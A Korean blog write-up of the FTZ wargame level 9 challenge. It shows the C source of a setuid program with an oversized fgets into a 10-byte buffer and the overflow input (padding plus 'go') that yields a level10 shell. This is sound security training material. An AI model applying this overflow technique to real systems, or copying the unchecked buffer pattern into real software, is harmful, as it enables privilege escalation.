[FTZ] level9 풀이

May 8, 2022 최대 1 분 소요

💡 FTZ level9 풀이

문제

계정 : level9/apple

hint

다음은 /usr/bin/bof의 소스이다.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

main(){

  char buf2[10];
  char buf[10];

  printf("It can be overflow : ");
  fgets(buf,40,stdin);

  if ( strncmp(buf2, "go", 2) == 0 )
   {
        printf("Good Skill!\n");
        setreuid( 3010, 3010 );
        system("/bin/bash");
   }

}

이를 이용하여 level10의 권한을 얻어라.

풀이

bof를 이용해서 buf2에 데이터가 buf데이터를 덮어써야 합니다.

우선 buf2와 buf 가 각각 몇바이트 만큼 할당 받았는지 확인 합니다.

gdb를 실행하려고 하니, permission denied가 나옵니다.

그냥 몇개 안되니 brute force를 해봅니다.

데이터의 할당은 4바이트 단위로 되기 때문에 12, 16 , 20 .. 이렇게 수행을 합니다.

다음과 같이 16개의 A로 덮어쓴 뒤에 쉘을 획득할 수 있었습니다.

[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAgo
[level9@ftz level9]$ /usr/bin/bof
It can be overflow : AAAAAAAAAAAAAAAAgo
Good Skill!
[level10@ftz level9]$ id
uid=3010(level10) gid=3009(level9) groups=3009(level9)

Twitter Facebook LinkedIn

Kang MyoungSeok

[FTZ] level9 풀이

문제

풀이

공유하기

댓글남기기

참고

[Hack The Box] Photobomb 풀이

[Hack The Box] Squashed 풀이

[Hack The Box] Shoppy 풀이

[Hack The Box] Ambassador 풀이